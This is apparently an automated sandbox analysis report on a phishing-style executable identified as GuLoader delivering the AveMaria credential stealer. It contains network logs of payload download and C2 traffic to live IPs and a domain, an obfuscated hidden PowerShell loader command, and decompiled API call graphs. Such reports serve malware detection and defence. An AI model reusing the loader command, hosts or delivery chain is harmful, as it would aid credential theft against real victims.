                                                      May 22, 2024 20:09:34.253535032 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:09:34.254100084 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:09:34.258964062 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:09:54.279090881 CEST785637231.192.107.180192.168.2.10
                                                      May 22, 2024 20:09:54.279587984 CEST5637278192.168.2.1031.192.107.180
                                                      May 22, 2024 20:09:54.284585953 CEST785637231.192.107.180192.168.2.10
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 22, 2024 20:08:18.272614956 CEST53525031.1.1.1192.168.2.10
                                                      May 22, 2024 20:08:52.401895046 CEST4992353192.168.2.101.1.1.1
                                                      May 22, 2024 20:08:52.429748058 CEST53499231.1.1.1192.168.2.10
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      May 22, 2024 20:08:52.401895046 CEST192.168.2.101.1.1.10xbe3aStandard query (0)mad.pzg-peru.comA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      May 22, 2024 20:08:52.429748058 CEST1.1.1.1192.168.2.100xbe3aNo error (0)mad.pzg-peru.com31.192.107.180A (IP address)IN (0x0001)false
                                                      • 72.11.156.201
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.105637172.11.156.201806536C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      May 22, 2024 20:08:49.184766054 CEST182OUTGET /VyNLorvhdmohGewWLK21.bin HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: 72.11.156.201
                                                      Cache-Control: no-cache
                                                      May 22, 2024 20:08:49.792885065 CEST1236INHTTP/1.1 200 OK
                                                      Content-Type: application/octet-stream
                                                      Last-Modified: Wed, 22 May 2024 06:00:22 GMT
                                                      Accept-Ranges: bytes
                                                      ETag: "abfeed54dacda1:0"
                                                      Server: Microsoft-IIS/8.5
                                                      Date: Wed, 22 May 2024 18:08:49 GMT
                                                      Content-Length: 156224
                                                      Data Raw: 86 ec 49 a4 fe 02 0c 13 78 a3 69 23 0c cc 86 26 b5 10 3d f2 b5 35 a2 99 ff d1 af 0c 36 33 1d 18 27 f1 92 82 b4 48 1e d4 ec a3 1e 3a bd 9f 78 9c 03 4e 41 2a 5f bb 9b a5 a1 5a 0f 27 ab d6 91 4b f3 9b 74 99 f5 71 9e 2e 85 e2 17 84 8d 21 b6 54 c9 c0 5b ff 10 3c 8a d8 da 58 9a 26 55 8d 82 00 17 7c dc 75 5e 26 9e a3 82 05 d2 e0 ea 64 53 23 e7 98 39 24 07 e0 68 19 6f dc bc a0 65 d6 f3 8a 60 89 e6 93 86 97 76 e2 e4 9c 8e 0a b3 89 d0 41 a5 f3 04 92 9e 86 ed 66 a4 c4 05 68 86 1b a9 80 65 01 1e f6 34 bf c9 6a 8e 77 0a 5d 95 ae b2 5d 75 bf b7 fe 9c 70 9c 02 c3 1c 57 9d 66 84 33 67 d4 43 94 39 bc 28 3b 79 56 32 ce f2 ed a3 7f 9a ab bd 05 3c fe 1b 8a e9 bb 77 40 6d 6c 9b 92 6b e0 62 6e a6 bd 3d e6 b1 22 19 a4 90 7d a0 a5 4a ee 96 36 2a 84 7d 0a 51 86 14 b5 8d eb 9d 72 d5 46 ee 65 d5 54 60 ef 30 30 7c 74 d0 3e f6 fd f0 c1 b8 a0 27 22 e0 49 48 5d c2 19 4a 42 59 83 70 7f c5 26 82 5e 00 d1 27 ed 79 cf 40 8a 18 89 0f 78 be 77 0a aa 30 6b 7d 12 c8 ed 62 39 2c e7 35 7a be 46 0a ee de 3a 27 92 d9 cf 5d f1 c9 d5 eb 31 3b [TRUNCATED]
                                                      Data Ascii: Ixi#&=563'H:xNA*_Z'Ktq.!T[<X&U|u^&dS#9$hoe`vAfhe4jw]]upWf3gC9(;yV2<w@mlkbn="}J6*}QrFeT`00|t>'"IH]JBYp&^'y@xw0k}b9,5zF:']1;FW&tG!muNOEc=~!|Y$f;TR'[gz]V}!$WY&PyDZKktG)7tq`}+0}!h17tAK3Twe}Fw{8)etX{G1Cp{-Yc^$`u9{b^cku[UxYK(H"=H07b#%t$TMfZac}W>O=h9;yx9x$#`+HX\Uwk?4{T0#nf6_p*ONH#n`@H\3N=44)b8sV(a>1Yo37`PzF%pbM&#Dw`RSRun+<-UTB5:LD_)!C'0Et5R{nZD2%uV}&-VW0T}S'^9/=-)'I}9Yg*
                                                      May 22, 2024 20:08:49.794770956 CEST224INData Raw: 83 f7 22 df 40 77 01 b6 bc a9 c6 aa a9 44 da 4e 75 fe 52 d3 ad e7 e6 9c c0 fc fb 94 bc 9d eb bc b4 7e 47 97 78 80 59 46 b3 77 15 73 2f c0 51 89 d7 25 60 cc 35 e6 6f e3 a0 86 3b a7 3b af dc 94 da 35 c2 fb d5 88 9e ad ca 9a 71 9e ef 93 4a af 6c 42
                                                      Data Ascii: "@wDNuR~GxYFws/Q%`5o;;5qJlBO'v%YB8Oo&~xTn`_Q{,X\C])W[Ha'1l5%g[~,f1NxrQ.#P-b%Z+b#y,
                                                      May 22, 2024 20:08:49.799566031 CEST1236INData Raw: e3 df a8 e9 42 80 59 67 a8 db ca fc 3a c4 6b 62 84 e6 bc 57 2a 8c 80 0a 8b 5a 30 d8 c7 e2 ba 7f 34 e3 94 76 bf eb e2 ce e4 42 b8 06 5c d5 45 15 a4 71 c9 b7 1a 0c c3 ec 0e d5 98 33 03 92 0a b0 87 6a 9c 69 8e 31 14 73 88 bb 0e 21 b2 73 90 d4 fe 2b
                                                      Data Ascii: BYg:kbW*Z04vB\Eq3ji1s!s+lpZp7IdP\[|v)xVf%$~A)wV1OWp5a""5Hy'9'Gf3M"e4YXi4DQti[_VV{S
                                                      May 22, 2024 20:08:49.804280043 CEST1236INData Raw: 50 e5 71 b2 d9 e9 65 52 19 af 13 52 1e b4 4a 21 9e 67 18 b3 68 10 75 40 83 35 9f 56 28 31 db 5f a6 51 01 e4 87 c9 26 50 ee 37 1f 93 99 7b 85 d9 d8 fa 90 e9 ee af fd f0 1e 39 5e 1c 16 cd c0 11 ba e0 3b 9f 0a 97 00 76 7b a8 f3 e7 ee 99 76 6f 1a de
                                                      Data Ascii: PqeRRJ!ghu@5V(1_Q&P7{9^;v{vo!=;zNM#v)u},\T2%w|>8i9.:iucqEqOw4nGTRAhWeB|$FavlxY;3GZTKlU i`~*^p/
                                                      May 22, 2024 20:08:49.804301023 CEST1236INData Raw: 1f 0d 5f 51 51 35 4a 08 f1 82 f2 09 ca 9c 0e a1 51 a3 05 6d 48 42 70 11 f8 63 a1 25 96 c4 bf 29 bc 9b 10 38 d7 06 7c 47 c6 dc ff 56 0d c5 96 c4 77 7e af 7f 81 ca b9 e0 d2 97 db 8c bc 1d a0 51 72 d3 74 55 68 1e 6c f1 aa 23 f0 88 11 f9 7c ea c2 00
                                                      Data Ascii: _QQ5JQmHBpc%)8|GVw~QrtUhl#|t`>b#*^*S_kZlxc!@N7`ngy%lqat ;CxMduWJN9&6ntlf(El8Ji@FWk0lc&^-%DM<pS
                                                      May 22, 2024 20:08:49.809108973 CEST672INData Raw: b5 9c 23 f9 6b c9 19 47 22 52 7f c9 10 96 e9 32 55 5d 60 a1 c2 c0 b9 13 4c 06 2c 3b d5 05 d8 2b c3 e5 8a 77 eb 7d 32 d7 a3 cd f8 70 e9 cf a1 fb 4e 30 9b 96 0c 3c 88 4c 63 df f6 8a c3 12 e5 f6 ad 06 64 b2 3d 10 9c 34 5f 2d 40 b0 1b 35 81 f3 48 d8
                                                      Data Ascii: #kG"R2U]`L,;+w}2pN0<Lcd=4_-@5H`Q^L\5+T}iu7CK6fFDeS's>sA!(ji(up^D=['Yh%JQK`ooWT?UV,pSvzG
                                                      May 22, 2024 20:08:49.879977942 CEST1236INData Raw: db 70 ec b2 2e 4d 58 57 03 9e 20 5b 00 54 24 63 69 17 4a aa f6 9c 7e c7 1b b7 43 31 25 cc 3f 85 26 60 7e bb 0f b7 80 c2 94 94 5e e1 39 0a a2 2e 16 5b 15 7b c0 31 b2 8c 7a cc 71 e7 33 8f 8d 17 93 b4 fb 7b fb b8 11 19 28 dd 38 00 75 46 57 7f e0 f3
                                                      Data Ascii: p.MXW [T$ciJ~C1%?&`~^9.[{1zq3{(8uFW?{M,*%@2xV1ih|xZ^xz-`"@*oedZmFPFv'!Z.+3!_2VnIc)WmZS:bdZox^"a6k~C
                                                      May 22, 2024 20:08:49.880018950 CEST1236INData Raw: 24 24 d6 75 90 71 dc 12 82 dc 8d 10 c9 5a 4a ae 8b c0 9d d5 1e f6 3c 20 d1 76 c4 29 ef ec c5 9d 36 36 f5 2e b8 92 d2 7d 89 b4 d3 82 82 cb 4b 9c 20 b3 2b 94 1f a7 83 84 a4 80 5c 29 a7 2e b0 5a ce 30 1b ef 56 ed f6 24 a6 28 ff b7 c6 e0 f0 80 4e d9
                                                      Data Ascii: $$uqZJ< v)66.}K +\).Z0V$(NZ&C[E+ka45LpX\~Ytv=4X2PZ|xa@m>a<v1`:z*pS)1bg,fpS@2,D_SR~$4I5)
                                                      May 22, 2024 20:08:49.883544922 CEST448INData Raw: 9f a7 7f 39 ae a8 a8 b5 54 21 37 18 11 99 cd 56 af c7 24 8b 81 4d ac 5b 9d 03 03 c1 17 c8 a0 03 d4 64 c9 cb c5 66 7e a5 f6 42 ed b5 76 17 54 ff 60 46 7d 34 d1 85 7e 01 cf 12 30 97 ea c5 82 29 4f 01 55 b4 a3 17 00 c9 27 da db 89 2d e8 a8 e9 c3 2d
                                                      Data Ascii: 9T!7V$M[df~BvT`F}4~0)OU'--R+2eC\K.ifX@P-TWfEI0snb7r,UBxE;69*rK^q1FFmlK7QB~GD`sKa`p;d]`IVd
                                                      May 22, 2024 20:08:49.883569002 CEST1236INData Raw: e3 da 54 9c ed 41 91 81 f8 b4 71 73 1d 2b 20 9a 3d 66 85 19 6e c9 d7 26 17 ac b9 0f ec 03 e5 02 9f ce bc 79 89 17 0c 8a f9 82 ab 93 43 d6 e3 d2 1f da cd 66 63 13 20 81 2b 44 19 ac 28 c0 b9 79 03 82 58 77 0a 29 dc 67 f0 57 38 66 ae 69 c4 be d3 d5
                                                      Data Ascii: TAqs+ =fn&yCfc +D(yXw)gW8fiG~705?!1;'uC!'^pVA8(`D7Yi#*rJ19ggKrt}KlW[" Y5LI&1\k?dp{@(`bHgNA!vz7I
                                                      May 22, 2024 20:08:49.891460896 CEST1236INData Raw: b6 b8 a7 dd 69 dc 0b bc 00 b6 86 73 62 2b 1b f6 7d a3 a0 7d 1f 6a d3 5f 3f 3c 2a e7 89 38 56 77 d7 f0 02 97 cc 5b b2 6f de 39 b0 01 c8 99 4e 30 3a ba 56 09 49 cf bc f0 73 83 65 49 30 4e 52 1c 26 a6 8b 77 14 4c 87 d0 ed 34 1f 65 ff 93 93 fa a6 87
                                                      Data Ascii: isb+}}j_?<*8Vw[o9N0:VIseI0NR&wL4e1+..+50E}M2ybEmSeVF5I.Oh"@/O!~/'%:*Y8 ?5JkJ_F!iybmK#cLMn


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:14:07:54
                                                      Start date:22/05/2024
                                                      Path:C:\Users\user\Desktop\PO2737478834ORDER.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\PO2737478834ORDER.exe"
                                                      Imagebase:0x400000
                                                      File size:467'152 bytes
                                                      MD5 hash:6D84FE81C98C02205CC129F68ACA4529
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:14:07:57
                                                      Start date:22/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)"
                                                      Imagebase:0x7e0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1779698085.000000000A28F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:14:07:57
                                                      Start date:22/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff620390000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:14:07:58
                                                      Start date:22/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                      Imagebase:0xd70000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:14:08:34
                                                      Start date:22/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                      Imagebase:0x630000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:20.8%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:21.2%
                                                        Total number of Nodes:1401
                                                        Total number of Limit Nodes:42
                                                        execution_graph 4167 401d44 4168 402bac 17 API calls 4167->4168 4169 401d52 SetWindowLongA 4168->4169 4170 402a5a 4169->4170 4171 401ec5 4172 402bac 17 API calls 4171->4172 4173 401ecb 4172->4173 4174 402bac 17 API calls 4173->4174 4175 401ed7 4174->4175 4176 401ee3 ShowWindow 4175->4176 4177 401eee EnableWindow 4175->4177 4178 402a5a 4176->4178 4177->4178 3285 401746 3291 402bce 3285->3291 3289 401754 3290 405c89 2 API calls 3289->3290 3290->3289 3292 402bda 3291->3292 3301 406154 3292->3301 3295 40174d 3297 405c89 3295->3297 3298 405c94 GetTickCount GetTempFileNameA 3297->3298 3299 405cc1 3298->3299 3300 405cc5 3298->3300 3299->3298 3299->3300 3300->3289 3314 406161 3301->3314 3302 406383 3303 402bfb 3302->3303 3334 4060c1 lstrcpynA 3302->3334 3303->3295 3318 40639c 3303->3318 3305 40635d lstrlenA 3305->3314 3308 406154 10 API calls 3308->3305 3309 406279 GetSystemDirectoryA 3309->3314 3311 40628c GetWindowsDirectoryA 3311->3314 3312 40639c 5 API calls 3312->3314 3313 4062c0 SHGetSpecialFolderLocation 3313->3314 3317 4062d8 SHGetPathFromIDListA CoTaskMemFree 3313->3317 3314->3302 3314->3305 3314->3308 3314->3309 3314->3311 3314->3312 3314->3313 3315 406154 10 API calls 3314->3315 3316 406306 lstrcatA 3314->3316 3327 405fa8 3314->3327 3332 40601f wsprintfA 3314->3332 3333 4060c1 lstrcpynA 3314->3333 3315->3314 3316->3314 3317->3314 3324 4063a8 3318->3324 3319 406410 3320 406414 CharPrevA 3319->3320 3322 40642f 3319->3322 3320->3319 3321 406405 CharNextA 3321->3319 3321->3324 3322->3295 3324->3319 3324->3321 3325 4063f3 CharNextA 3324->3325 3326 406400 CharNextA 3324->3326 3339 405a84 3324->3339 3325->3324 3326->3321 3335 405f47 3327->3335 3330 40600b 3330->3314 3331 405fdc RegQueryValueExA RegCloseKey 3331->3330 3332->3314 3333->3314 3334->3303 3336 405f56 3335->3336 3337 405f5a 3336->3337 3338 405f5f RegOpenKeyExA 3336->3338 3337->3330 3337->3331 3338->3337 3340 405a8a 3339->3340 3341 405a9d 3340->3341 3342 405a90 CharNextA 3340->3342 3341->3324 3342->3340 4179 401947 4180 402bce 17 API calls 4179->4180 4181 40194e lstrlenA 4180->4181 4182 402620 4181->4182 4190 404b4a GetDlgItem GetDlgItem 4191 404ba0 7 API calls 4190->4191 4195 404dc7 4190->4195 4192 404c48 DeleteObject 4191->4192 4193 404c3c SendMessageA 4191->4193 4194 404c53 4192->4194 4193->4192 4196 404c8a 4194->4196 4198 406154 17 API calls 4194->4198 4207 404ea9 4195->4207 4219 404e36 4195->4219 4244 404a98 SendMessageA 4195->4244 4199 404145 18 API calls 4196->4199 4197 404f55 4202 404f67 4197->4202 4203 404f5f SendMessageA 4197->4203 4204 404c6c SendMessageA SendMessageA 4198->4204 4200 404c9e 4199->4200 4205 404145 18 API calls 4200->4205 4201 404dba 4209 4041ac 8 API calls 4201->4209 4214 404f80 4202->4214 4215 404f79 ImageList_Destroy 4202->4215 4220 404f90 4202->4220 4203->4202 4204->4194 4223 404caf 4205->4223 4206 404f02 SendMessageA 4206->4201 4212 404f17 SendMessageA 4206->4212 4207->4197 4207->4201 4207->4206 4208 404e9b SendMessageA 4208->4207 4213 405155 4209->4213 4211 405109 4211->4201 4221 40511b ShowWindow GetDlgItem ShowWindow 4211->4221 4218 404f2a 4212->4218 4216 404f89 GlobalFree 4214->4216 4214->4220 4215->4214 4216->4220 4217 404d89 GetWindowLongA SetWindowLongA 4222 404da2 4217->4222 4228 404f3b SendMessageA 4218->4228 4219->4207 4219->4208 4220->4211 4237 404fcb 4220->4237 4249 404b18 4220->4249 4221->4201 4224 404da7 ShowWindow 4222->4224 4225 404dbf 4222->4225 4223->4217 4227 404d01 SendMessageA 4223->4227 4229 404d84 4223->4229 4231 404d53 SendMessageA 4223->4231 4232 404d3f SendMessageA 4223->4232 4242 40417a SendMessageA 4224->4242 4243 40417a SendMessageA 4225->4243 4227->4223 4228->4197 4229->4217 4229->4222 4231->4223 4232->4223 4234 4050d5 4235 4050df InvalidateRect 4234->4235 4238 4050eb 4234->4238 4235->4238 4236 404ff9 SendMessageA 4241 40500f 4236->4241 4237->4236 4237->4241 4238->4211 4258 404a53 4238->4258 4240 405083 SendMessageA SendMessageA 4240->4241 4241->4234 4241->4240 4242->4201 4243->4195 4245 404af7 SendMessageA 4244->4245 4246 404abb GetMessagePos ScreenToClient SendMessageA 4244->4246 4248 404aef 4245->4248 4247 404af4 4246->4247 4246->4248 4247->4245 4248->4219 4261 4060c1 lstrcpynA 4249->4261 4251 404b2b 4262 40601f wsprintfA 4251->4262 4253 404b35 4254 40140b 2 API calls 4253->4254 4255 404b3e 4254->4255 4263 4060c1 lstrcpynA 4255->4263 4257 404b45 4257->4237 4264 40498e 4258->4264 4260 404a68 4260->4211 4261->4251 4262->4253 4263->4257 4265 4049a4 4264->4265 4266 406154 17 API calls 4265->4266 4267 404a08 4266->4267 4268 406154 17 API calls 4267->4268 4269 404a13 4268->4269 4270 406154 17 API calls 4269->4270 4271 404a29 lstrlenA wsprintfA SetDlgItemTextA 4270->4271 4271->4260 4275 401fcb 4276 402bce 17 API calls 4275->4276 4277 401fd2 4276->4277 4278 406435 2 API calls 4277->4278 4279 401fd8 4278->4279 4281 401fea 4279->4281 4282 40601f wsprintfA 4279->4282 4282->4281 3437 700d1000 3440 700d1096 3437->3440 3513 700d17c3 GetCurrentProcess GetModuleHandleA GetProcAddress 3440->3513 3443 700d10e4 GetModuleFileNameA GlobalAlloc 3446 700d1127 3443->3446 3444 700d1221 GlobalAlloc 3445 700d1238 3444->3445 3447 700d1250 FindWindowExA FindWindowExA 3445->3447 3461 700d126f 3445->3461 3448 700d112c CharPrevA 3446->3448 3449 700d1146 3446->3449 3447->3461 3448->3446 3448->3449 3450 700d1166 GetTempFileNameA CopyFileA 3449->3450 3451 700d1150 3449->3451 3452 700d11ff lstrcatA lstrlenA 3450->3452 3453 700d1196 CreateFileA CreateFileMappingA MapViewOfFile 3450->3453 3528 700d1ac2 3451->3528 3452->3445 3456 700d11cb UnmapViewOfFile 3453->3456 3457 700d11f1 CloseHandle CloseHandle 3453->3457 3456->3457 3457->3452 3460 700d102b 3462 700d129b lstrcmpiA 3461->3462 3518 700d1a82 3461->3518 3523 700d18b9 lstrlenA 3461->3523 3462->3461 3463 700d12b0 lstrcmpiA 3462->3463 3463->3461 3464 700d12c0 3463->3464 3465 700d12ef GetVersion 3464->3465 3466 700d12c4 3464->3466 3468 700d1364 3465->3468 3469 700d1390 3465->3469 3467 700d1ac2 2 API calls 3466->3467 3472 700d12ce 3467->3472 3473 700d136e 3468->3473 3474 700d1373 GlobalAlloc 3468->3474 3470 700d139d InitializeSecurityDescriptor SetSecurityDescriptorDacl 3469->3470 3471 700d13c4 CreatePipe 3469->3471 3470->3471 3476 700d144a lstrcpyA 3471->3476 3477 700d13dd CreatePipe 3471->3477 3480 700d12de DeleteFileA 3472->3480 3481 700d12e7 3472->3481 3473->3474 3475 700d138e 3474->3475 3474->3476 3475->3469 3479 700d145c 3476->3479 3477->3476 3478 700d13f0 GetStartupInfoA CreateProcessA 3477->3478 3478->3476 3482 700d151c GetTickCount 3478->3482 3483 700d146a 3479->3483 3484 700d1464 3479->3484 3480->3481 3481->3465 3487 700d152a WaitForSingleObject GetExitCodeProcess 3482->3487 3486 700d147e 3483->3486 3490 700d1473 3483->3490 3485 700d1ac2 2 API calls 3484->3485 3485->3483 3488 700d1499 3486->3488 3489 700d1487 lstrcpyA 3486->3489 3491 700d1544 PeekNamedPipe 3487->3491 3494 700d14b9 3488->3494 3495 700d14a1 wsprintfA 3488->3495 3489->3488 3531 700d183d 3490->3531 3492 700d172e 3491->3492 3493 700d155e GetTickCount ReadFile 3491->3493 3492->3479 3500 700d176f Sleep 3492->3500 3501 700d173e GetTickCount 3492->3501 3497 700d159a 3493->3497 3498 700d1ac2 2 API calls 3494->3498 3495->3494 3497->3487 3497->3491 3508 700d1652 lstrcpyA 3497->3508 3509 700d16be GlobalReAlloc 3497->3509 3510 700d183d 5 API calls 3497->3510 3536 700d1784 3497->3536 3502 700d14c5 6 API calls 3498->3502 3500->3487 3501->3500 3503 700d174d TerminateProcess lstrcpyA 3501->3503 3504 700d14f4 3502->3504 3503->3487 3505 700d14fc DeleteFileA 3504->3505 3506 700d1505 GlobalFree 3504->3506 3505->3506 3506->3460 3507 700d1514 GlobalFree 3506->3507 3507->3460 3508->3497 3509->3497 3511 700d1710 lstrcpyA 3509->3511 3510->3497 3511->3487 3514 700d17ff 3513->3514 3515 700d1819 GetProcAddress 3513->3515 3514->3515 3516 700d10dc 3514->3516 3515->3516 3517 700d1828 3515->3517 3516->3443 3516->3444 3517->3516 3519 700d1a8c 3518->3519 3520 700d1abb 3518->3520 3519->3520 3521 700d1aac GlobalFree 3519->3521 3522 700d1a99 lstrcpyA 3519->3522 3520->3461 3521->3520 3522->3521 3524 700d18fa lstrlenA 3523->3524 3525 700d18d3 lstrcmpiA 3524->3525 3527 700d1902 3524->3527 3526 700d18f1 CharNextA 3525->3526 3525->3527 3526->3524 3527->3461 3529 700d1acb GlobalAlloc lstrcpynA 3528->3529 3530 700d115a GlobalFree 3528->3530 3529->3530 3530->3460 3532 700d184e 3531->3532 3533 700d147c 3531->3533 3534 700d1869 SendMessageA SendMessageA SendMessageA 3532->3534 3535 700d1859 lstrlenA OemToCharBuffA 3532->3535 3533->3486 3534->3533 3535->3534 3537 700d178f CharNextExA 3536->3537 3538 700d17bd 3536->3538 3537->3538 3538->3497 4283 402a53 InvalidateRect 4284 402a5a 4283->4284 4043 4014d6 4048 402bac 4043->4048 4045 4014dc Sleep 4047 402a5a 4045->4047 4049 406154 17 API calls 4048->4049 4050 402bc1 4049->4050 4050->4045 4285 4045d7 4286 404603 4285->4286 4287 404614 4285->4287 4346 4057c1 GetDlgItemTextA 4286->4346 4288 404620 GetDlgItem 4287->4288 4321 40467f 4287->4321 4294 404634 4288->4294 4290 40460e 4292 40639c 5 API calls 4290->4292 4291 404763 4295 40490d 4291->4295 4348 4057c1 GetDlgItemTextA 4291->4348 4292->4287 4293 404648 SetWindowTextA 4299 404145 18 API calls 4293->4299 4294->4293 4298 405af2 4 API calls 4294->4298 4297 4041ac 8 API calls 4295->4297 4302 404921 4297->4302 4303 40463e 4298->4303 4304 404664 4299->4304 4300 406154 17 API calls 4305 4046f3 SHBrowseForFolderA 4300->4305 4301 404793 4306 405b47 18 API calls 4301->4306 4303->4293 4310 405a59 3 API calls 4303->4310 4307 404145 18 API calls 4304->4307 4305->4291 4308 40470b CoTaskMemFree 4305->4308 4309 404799 4306->4309 4311 404672 4307->4311 4312 405a59 3 API calls 4308->4312 4349 4060c1 lstrcpynA 4309->4349 4310->4293 4347 40417a SendMessageA 4311->4347 4314 404718 4312->4314 4318 40474f SetDlgItemTextA 4314->4318 4322 406154 17 API calls 4314->4322 4316 4047b0 4320 4064ca 5 API calls 4316->4320 4317 404678 4319 4064ca 5 API calls 4317->4319 4318->4291 4319->4321 4328 4047b7 4320->4328 4321->4291 4321->4295 4321->4300 4323 404737 lstrcmpiA 4322->4323 4323->4318 4325 404748 lstrcatA 4323->4325 4324 4047f3 4350 4060c1 lstrcpynA 4324->4350 4325->4318 4327 4047fa 4329 405af2 4 API calls 4327->4329 4328->4324 4333 405aa0 2 API calls 4328->4333 4334 40484b 4328->4334 4330 404800 GetDiskFreeSpaceA 4329->4330 4332 404824 MulDiv 4330->4332 4330->4334 4332->4334 4333->4328 4335 4048bc 4334->4335 4337 404a53 20 API calls 4334->4337 4336 4048df 4335->4336 4339 40140b 2 API calls 4335->4339 4351 404167 KiUserCallbackDispatcher 4336->4351 4338 4048a9 4337->4338 4340 4048be SetDlgItemTextA 4338->4340 4341 4048ae 4338->4341 4339->4336 4340->4335 4343 40498e 20 API calls 4341->4343 4343->4335 4344 4048fb 4344->4295 4352 404530 4344->4352 4346->4290 4347->4317 4348->4301 4349->4316 4350->4327 4351->4344 4353 404543 SendMessageA 4352->4353 4354 40453e 4352->4354 4353->4295 4354->4353 4051 401759 4052 402bce 17 API calls 4051->4052 4053 401760 4052->4053 4054 401786 4053->4054 4055 40177e 4053->4055 4091 4060c1 lstrcpynA 4054->4091 4090 4060c1 lstrcpynA 4055->4090 4058 401784 4062 40639c 5 API calls 4058->4062 4059 401791 4060 405a59 3 API calls 4059->4060 4061 401797 lstrcatA 4060->4061 4061->4058 4080 4017a3 4062->4080 4063 406435 2 API calls 4063->4080 4064 405c35 2 API calls 4064->4080 4066 4017ba CompareFileTime 4066->4080 4067 40187e 4069 4051e8 24 API calls 4067->4069 4068 401855 4070 4051e8 24 API calls 4068->4070 4079 40186a 4068->4079 4072 401888 4069->4072 4070->4079 4071 4060c1 lstrcpynA 4071->4080 4073 4030d8 35 API calls 4072->4073 4074 40189b 4073->4074 4075 4018af SetFileTime 4074->4075 4076 4018c1 FindCloseChangeNotification 4074->4076 4075->4076 4078 4018d2 4076->4078 4076->4079 4077 406154 17 API calls 4077->4080 4081 4018d7 4078->4081 4082 4018ea 4078->4082 4080->4063 4080->4064 4080->4066 4080->4067 4080->4068 4080->4071 4080->4077 4085 4057dd MessageBoxIndirectA 4080->4085 4089 405c5a GetFileAttributesA CreateFileA 4080->4089 4083 406154 17 API calls 4081->4083 4084 406154 17 API calls 4082->4084 4086 4018df lstrcatA 4083->4086 4087 4018f2 4084->4087 4085->4080 4086->4087 4088 4057dd MessageBoxIndirectA 4087->4088 4088->4079 4089->4080 4090->4058 4091->4059 4355 401959 4356 402bac 17 API calls 4355->4356 4357 401960 4356->4357 4358 402bac 17 API calls 4357->4358 4359 40196d 4358->4359 4360 402bce 17 API calls 4359->4360 4361 401984 lstrlenA 4360->4361 4362 401994 4361->4362 4363 4019d4 4362->4363 4367 4060c1 lstrcpynA 4362->4367 4365 4019c4 4365->4363 4366 4019c9 lstrlenA 4365->4366 4366->4363 4367->4365 4368 40515c 4369 405180 4368->4369 4370 40516c 4368->4370 4371 405188 IsWindowVisible 